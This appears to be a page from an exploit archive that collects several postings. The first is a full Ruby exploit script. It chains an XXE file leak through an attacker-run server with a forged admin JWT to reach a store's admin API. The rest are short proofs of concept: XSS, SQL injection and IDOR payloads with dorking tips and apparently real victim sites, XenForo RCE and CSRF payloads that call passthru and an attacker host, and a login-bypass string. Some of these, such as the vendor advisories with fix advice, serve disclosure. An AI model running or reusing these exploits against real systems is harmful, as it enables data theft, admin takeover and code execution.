<pre><code>#!/usr/bin/env ruby -W0<br /><br />require 'bundler'<br />Bundler.require(:default)<br /><br />DEBUG = false<br />USE_PROXY = false<br />PROXY_ADDR = '127.0.0.1'<br />PROXY_PORT = 8080<br /><br />def debug(msg)<br /> puts msg.inspect if DEBUG<br />end<br /><br />def rand_text(length = 8)<br /> # random string generator<br /> o = [('a'..'z'), ('A'..'Z')].map(&:to_a).flatten<br /> (0...length).map { o[rand(o.length)] }.join<br />end<br /><br />def dtd_param_name<br /> @dtd_param_name ||= rand_text()<br />end<br /><br />def ent_eval<br /> @ent_eval ||= rand_text()<br />end<br /><br />def leak_param_name<br /> @leak_param_name ||= rand_text()<br />end<br /><br />def remote_addr<br /> @remote_addr ||= "http://#{@srv_host.host}:#{@srv_host.port}"<br />end<br /><br />def http<br /> @http ||= begin<br /> http = if USE_PROXY<br /> Net::HTTP.new(@target_uri.host, @target_uri.port, PROXY_ADDR, PROXY_PORT)<br /> else<br /> Net::HTTP.new(@target_uri.host, @target_uri.port)<br /> end<br /><br /> if @target_uri.port == 443 || @target_uri.to_s.match(%r{http(s).*})<br /> http.use_ssl = true<br /> http.verify_mode = OpenSSL::SSL::VERIFY_NONE<br /> end<br /><br /> http.set_debug_output($stderr) if DEBUG<br /> http<br /> end<br />end<br /><br />def make_xxe_dtd<br /> filter_path = 'php://filter/convert.base64-encode/resource=../app/etc/env.php'<br /> ent_file = rand_text()<br /> %(<br /> <!ENTITY % #{ent_file} SYSTEM "#{filter_path}"><br /> <!ENTITY % #{dtd_param_name} "<!ENTITY #{ent_eval} SYSTEM '#{remote_addr}/?#{leak_param_name}=%#{ent_file};'>"><br /> )<br />end<br /><br />def xxe_xml_data()<br /> param_entity_name = rand_text()<br /><br /> xml = "<?xml version='1.0' ?>"<br /> xml += "<!DOCTYPE #{rand_text()}"<br /> xml += '['<br /> xml += " <!ELEMENT #{rand_text()} ANY >"<br /> xml += " <!ENTITY % #{param_entity_name} SYSTEM '#{remote_addr}/#{rand_text}.dtd'> %#{param_entity_name}; %#{dtd_param_name}; "<br /> xml += ']'<br /> xml += "> <r>&#{ent_eval};</r>"<br /><br /> xml<br />end<br /><br />LIBXML_NOENT = 2<br />LIBXML_PARSEHUGE = 524288<br /><br />def xxe_request()<br /> debug('Sending XXE request')<br /><br /> signature = rand_text().capitalize<br /><br /> post_data = {<br /> "address": {<br /> "#{signature}": rand_text(),<br /> "totalsCollector": {<br /> "collectorList": {<br /> "totalCollector": {<br /> "\u0073\u006F\u0075\u0072\u0063\u0065\u0044\u0061\u0074\u0061": {<br /> "data": xxe_xml_data(),<br /> "options": LIBXML_NOENT|LIBXML_PARSEHUGE<br /> }<br /> }<br /> }<br /> }<br /> }<br /> }.to_json<br /> req = Net::HTTP::Post.new('/rest/V1/guest-carts/1/estimate-shipping-methods')<br /> req.body = post_data<br /> req.content_type = 'application/json'<br /> # req.user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)'<br /> res = http.request(req)<br /><br /> raise RuntimeError, "Server returned unexpected response" unless res&.code == '400'<br /><br /> body = JSON.parse(res.body)<br /><br /> raise RuntimeError, "Server returned unexpected response" unless body['parameters']['fieldName'] == signature<br /><br />end<br /><br />TARGET_USER_ID = 1<br /><br />USER_TYPE_INTEGRATION = 1;<br />USER_TYPE_ADMIN = 2;<br />USER_TYPE_CUSTOMER = 3;<br />USER_TYPE_GUEST = 4;<br /><br />def jwt_encode(key, algorithm = 'HS256')<br /> def pad_key(key, total_length, pad_char)<br /> left_padding = (total_length - key.length) / 2<br /> right_padding = total_length - key.length - left_padding<br /> pad_char * left_padding + key + pad_char * right_padding<br /> end<br /> header = {<br /> kid: "1",<br /> alg: "HS256"<br /> }<br /><br /> payload = {<br /> uid: TARGET_USER_ID, <br /> utypid: USER_TYPE_ADMIN,<br /> iat: Time.now.to_i, # Token issue time',<br /> exp: Time.now.to_i + 10 * 24 * 60 * 60, # Token expiration time<br /> }<br /><br /> def base64_url_encode(str)<br /> Base64.urlsafe_encode64(str).tr('=', '')<br /> end<br /><br /> padded_key = pad_key(key, 2048, '&')<br /><br /> encoded_header = base64_url_encode(header.to_json)<br /> encoded_payload = base64_url_encode(payload.to_json)<br /><br /> # Create the signature<br /> data = "#{encoded_header}.#{encoded_payload}"<br /> signature = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), padded_key, data)<br /> encoded_signature = base64_url_encode(signature)<br /><br /> # Combine the header, payload, and signature to form the JWT<br /> "#{encoded_header}.#{encoded_payload}.#{encoded_signature}"<br /><br />end<br /><br />def exploit()<br /> begin<br /> puts "Starting web server..."<br /> body = make_xxe_dtd()<br /> file_content = nil<br /> file_content_reader, file_content_writer = IO.pipe<br /> WEBrick::HTTPRequest.const_set("MAX_URI_LENGTH", 10240)<br /> wbserver_options = {<br /> :BindAddress => '0.0.0.0',<br /> :Port => @srv_host.port,<br /> :Logger => WEBrick::Log.new($stderr, WEBrick::Log::DEBUG),<br /> :AccessLog => [],<br /> # :RequestTimeout => 300, # Increase request timeout<br /> # :RequestMaxUriLength => 100240 # Increase max URI length<br /> }<br /> wbserver_options[:Logger] = WEBrick::Log.new("/dev/null") unless DEBUG<br /><br /> pid = Process.fork do<br /> file_content_reader.close<br /><br /> server = WEBrick::HTTPServer.new(wbserver_options)<br /> server.mount_proc '/' do |req, res|<br /> if req.path =~ /\.dtd$/<br /> res.body = body<br /> elsif req.query_string.match(/#{leak_param_name}=(.*)/)<br /> file_content = Base64.decode64(Regexp.last_match(1))<br /> # puts "Received leaked file content:\n#{file_content}"<br /> file_content_writer.puts file_content<br /><br /> else<br /> res.body = 'OK'<br /> end<br /> end<br /><br /> trap("INT") do<br /> server.shutdown<br /> file_content_writer.close<br /> end<br /><br /> server.start<br /> end<br /><br /> sleep(1)<br /> xxe_request()<br /> file_content_writer.close<br /><br /> begin<br /> # Set a timeout for reading from the pipe<br /> Timeout.timeout(5) do # 5 seconds timeout, adjust as necessary<br /> file_content = file_content_reader.read_nonblock(10000) # Adjust the size as necessary<br /> end<br /> rescue Timeout::Error<br /> puts "Reading from pipe timed out."<br /> rescue EOFError<br /> puts "End of file reached."<br /> ensure<br /> file_content_reader.close<br /> end<br /><br /> # Use file_content as needed here<br /> if file_content<br /> # puts "Successfully read file content:\n#{file_content}"<br /> key = file_content.match(/'key' => '(.*)'/)[1]<br /> if key<br /> debug "Found key: #{key}"<br /> jwt = jwt_encode(key)<br /> puts "Generated JWT: #{jwt}"<br /> puts("Sending request with JWT to coupons endpoint")<br /> # Perform authenticated request to a admin endpoint<br /> res = http.request(Net::HTTP::Get.new('/rest/default/V1/coupons/search?searchCriteria=', {'Authorization' => "Bearer #{jwt}"}))<br /> raise RuntimeError, "Server returned unexpected response" unless res&.code == '200'<br /> puts "Available coupons:"<br /> puts JSON.pretty_generate(JSON.parse(res.body))<br /> else<br /> puts "Failed to extract key from file content."<br /> end<br /> else<br /> puts "Failed to read file content or content is empty."<br /> end<br /><br /> puts "Exploit completed"<br /><br /> rescue RuntimeError => e<br /> puts "#{e.class} - #{e.message}"<br /> ensure<br /> if pid<br /> Process.kill("INT", pid)<br /> Process.wait(pid)<br /> end<br /> end<br />end<br /><br />if __FILE__ == $0<br /> @target_uri = URI.parse(ARGV[0])<br /> @srv_host = URI.parse(ARGV[1])<br /><br /> exploit()<br />end<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Xhibiter NFT Marketplace 1.10.2 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://elements.envato.com/xhibiter-nft-marketplace-html-template-AQN45FA |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : /search.php?id=1'%22()%26%25<acx><ScRiPt%20>prompt(915136)</ScRiPt><br /><br />[+] https://www/127.0.0.1/gatesea.io/search.php?id=1'"()%26%25<acx><ScRiPt >prompt(915136)</ScRiPt><br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : eStore CMS v2.0 Sql injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://www.2iraq.com/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : "CMS.php?CMS_P=" or "News_Details.php?ID="<===== inject here<br /><br />[+] https://www/127.0.0.1/uruk.edu.iq/News_Details.php?ID=467<br /><br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Clenix v1.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.1 (64 bits) |<br />| # Vendor : https://www.radiustheme.com/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : /admin/main.php<br /><br />[+] https://www/127.0.0.1/otabucert.co.uk/admin/main.php<br /><br />[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Candy Redis V2.1.2 HTML Form in redirect page Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://bacadigital.com/pasti-bisa-panduan-ujian-cbt-untuk-pengguna/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Vulnerability description :<br /><br /><br />An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302.<br /> Therefore, all browser users will not see the contents of this page and will not be able to interact with the HTML form. <br /><br />Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example: <br /><?php<br /> if (!isset($_SESSION["authenticated"])) {<br /> header("Location: auth.php");<br /> }<br />?><br /><title>Administration page</title><br /><form action="/admin/action" method="post"><br /> <!-- ... form inputs ... --><br /></form><br /> <br /><!-- ... the rest of the administration page ... --><br />This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. An attacker can access the content the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). This creates an authentication bypass vulnerability. <br />The correct code would be <br /><br /><?php<br /> if (!isset($_SESSION[auth])) {<br /> header("Location: auth.php");<br /> exit();<br /> }<br />?><br /><title>Administration page</title><br /><form action="/admin/action" method="post"><br /> <!-- ... form inputs ... --><br /></form><br /> <br /><!-- ... the rest of the administration page ... --><br /><br />[+] infected item : /pass. <br /><br />[+] Attack details :<br /><br />Form action=''<br /><br />GET /pass/ HTTP/1.1<br />Pragma: no-cache<br />Cache-Control: no-cache<br />Referer: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/pass<br />Acunetix-Aspect: enabled<br />Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c<br />Acunetix-Aspect-Queries: filelist;aspectalerts<br />Cookie: PHPSESSID=dc1a2974e1afffa5b1926d0e4f3ff57f<br />Host: elearning7.smpn49-jkt.sch.id<br />Connection: Keep-alive<br />Accept-Encoding: gzip,deflate<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21<br />Accept: */*<br /><br />Response<br />HTTP/1.1 302 Found<br />Connection: Keep-Alive<br />Keep-Alive: timeout=5, max=100<br />x-powered-by: PHP/7.3.33<br />location: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/login.php<br />content-type: text/html; charset=UTF-8<br />content-length: 16992<br />vary: Accept-Encoding,User-Agent<br />date: Fri, 19 Jul 2024 10:09:49 GMT<br />server: LiteSpeed<br />cache-control: no-cache, no-store, must-revalidate, max-age=0<br />platform: hostinger<br />strict-transport-security: max-age=31536000; includeSubDomains; preload<br />x-xss-protection: 1; mode=block<br />x-content-type-options: nosniff<br />Original-Content-Encoding: gzip<br /><br />[+] The impact of this vulnerability : depends on the affected web application.<br /><br />[+] How to fix this vulnerability : Make sure the script is terminated after redirecting the user to another page<br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Agop CMS v1.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://gico.io/agop/demos/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.<br /><br />[+] use payload : /admin/managePages.php<br /><br />[+] https://www/127.0.0.1/tiktrades.com/admin/managePages.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>-----------------------------------------------------------------------<br />XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability<br />-----------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://xenforo.com<br /><br /><br />[-] Affected Versions:<br /><br />Version 2.2.15 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />XenForo implements a template system which gives complete control over<br />the layout of XenForo pages. Through these templates, it might be<br />possible to call certain "callback methods", however there is a sort<br />of "sandbox" which allows to solely call read-only methods: a method<br />is to be considered read-only when it begins with one of the allowed<br />prefixes, such as "get" or "filter". Malicious users might be able to<br />bypass this "sandbox" by abusing the getRepository() method from the<br />XF\Mvc\Entity\Manager class in order to get an instance object of the<br />XF\Util\Arr class, and from there they can abuse its filterRecursive()<br />static method in order to execute arbitrary callbacks or functions<br />(internally, this method calls the array_filter() PHP function with an<br />attacker-controlled "callback" parameter). As such, this can be<br />exploited to e.g. execute arbitrary OS commands by using a payload<br />like the following within a template, which will try to execute the<br />passthru() PHP function passing to it the string "whoami" as argument,<br />potentially resulting in the execution of the "whoami" command on the<br />web server:<br /><br />{{ $xf.app.em.getRepository('XF\Util\Arr').filterRecursive(['whoami'],'passthru')<br />}}<br /><br />Successful exploitation of this vulnerability requires an account with<br />permissions to administer styles or widgets.<br /><br /><br />[-] Solution:<br /><br />Update to a fixed version or apply the vendor patches.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[22/02/2024] - Vulnerability details sent to SSD Secure Disclosure<br />[05/06/2024] - Vendor released patches and fixed versions<br />[14/06/2024] - CVE identifier requested<br />[16/06/2024] - CVE identifier assigned<br />[16/07/2024] - Coordinated public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org) has<br />assigned the name CVE-2024-38458 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Other References:<br /><br />https://xenforo.com/community/threads/222133<br />https://ssd-disclosure.com/ssd-advisory-xenforo-rce-via-csrf/<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2024-06<br /><br /></code></pre>
<pre><code>-------------------------------------------------------------------------------<br />XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability<br />-------------------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://xenforo.com<br /><br /><br />[-] Affected Versions:<br /><br />Version 2.2.15 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The XF\Admin\Controller\Widget::actionSave() method, defined into the<br />/src/XF/Admin/Controller/Widget.php script, does not check whether the<br />current HTTP request is a POST or a GET before saving a widget.<br />XenForo does perform anti-CSRF checks for POST requests only, as such<br />this method can be abused in a Cross-Site Request Forgery (CSRF)<br />attack to create/modify arbitrary XenForo widgets via GET requests,<br />and this can also be exploited in tandem with KIS-2024-06 to perform<br />CSRF-based Remote Code Execution (RCE) attacks.<br /><br />Furthermore, XenForo implements a BB code system, as such this<br />vulnerability could also be exploited through "Stored CSRF" attacks by<br />abusing the [img] BB code tag, creating a thread or a private message<br />(to be sent to the victim user) like the following:<br /><br />[img]https://attacker.website/exploit.php[/img]<br /><br />Where the exploit.php script hosted on the attacker-controlled website<br />could be something like this:<br /><br /><?php<br /><br />$url = "https://victim.website/xenforo/";<br /><br />header("Location:<br />{$url}admin.php?widgets/save&definition_id=html&widget_key=RCE&positions[pub_sidebar_top]=1&display_condition=true&options[template]={{\$xf.app.em.getRepository('XF\\Util\\Arr').filterRecursive(['id'],'passthru')}}");<br /><br />?><br /><br />Successful exploitation of this vulnerability requires a victim user<br />with permissions to administer styles or widgets to be currently<br />logged into the Admin Control Panel.<br /><br /><br />[-] Solution:<br /><br />Update to a fixed version or apply the vendor patches.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[22/02/2024] - Vulnerability details sent to SSD Secure Disclosure<br />[05/06/2024] - Vendor released patches and fixed versions<br />[14/06/2024] - CVE identifier requested<br />[16/06/2024] - CVE identifier assigned<br />[16/07/2024] - Coordinated public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org) has<br />assigned the name CVE-2024-38457 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Other References:<br /><br />https://xenforo.com/community/threads/222133<br />https://ssd-disclosure.com/ssd-advisory-xenforo-rce-via-csrf/<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2024-05<br /><br /></code></pre>
<pre><code># Exploit Title: Hospital Management System Project in ASP.Net MVC - SQL<br />Injection / Authentication Bypass<br /># Date: 07/16/2024<br /># Exploit Author: 0xMykull<br /># Vendor Hompage:<br />https://itsourcecode.com/free-projects/asp/hospital-management-system-project-in-asp-net-mvc-with-source-code/<br /># Software Link:<br />https://itsourcecode.com/free-projects/asp/hospital-management-system-project-in-asp-net-mvc-with-source-code/<br /># Version: 1<br /># CVE: CVE-2024-40502<br /><br />Description:<br />An SQL injection vulnerability has been discovered in the btn_login_b_Click<br />function of the affected web application. The vulnerability exists due to<br />the improper sanitization of user-supplied input in the login form.<br />Specifically, the txt_login_username.Text and txt_login_pass.Text fields<br />are concatenated directly into an SQL query string without proper<br />parameterization or escaping.<br /><br />Endpoint: https://localhost:44306/Users/Loginpage.aspx<br /><br />Bypass Payloads:<br /><br />(default user)<br />Username: kihsan'--<br />password: <anything><br /><br />Username: <anyvaliduser>'--<br />password: <anything><br /></code></pre>
<pre><code># Exploit Title: Bonjour Service - 'mDNSResponder.exe' Unquoted Service Path<br /># Discovery by: bios<br /># Discovery Date: 2024-15-07<br /># Vendor Homepage: https://developer.apple.com/bonjour/<br /># Tested Version: 3,0,0,10<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on OS: Microsoft Windows 10 Home<br /><br /># Step to discover Unquoted Service Path:<br /><br />C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"<br />|findstr /i /v "c:\windows\\" |findstr /i /v """<br />Bonjour Service<br /> Bonjour Service<br />C:\Program Files\Blizzard\Bonjour Service\mDNSResponder.exe<br /> Auto<br /><br />C:\>systeminfo<br /><br />Host Name: DESKTOP-HFBJOBG<br />OS Name: Microsoft Windows 10 Home<br />OS Version: 10.0.19045 N/A Build 19045<br /><br />PS C:\Program Files\Blizzard\Bonjour Service> powershell -command<br />"(Get-Command .\mDNSResponder.exe).FileVersionInfo.FileVersion"<br />>><br />3,0,0,10<br /><br />#Exploit:<br /><br />There is an Unquoted Service Path in Bonjour Services (mDNSResponder.exe) .<br />This may allow an authorized local user to insert arbitrary code into the<br />unquoted service path and escalate privileges.<br /><br /></code></pre>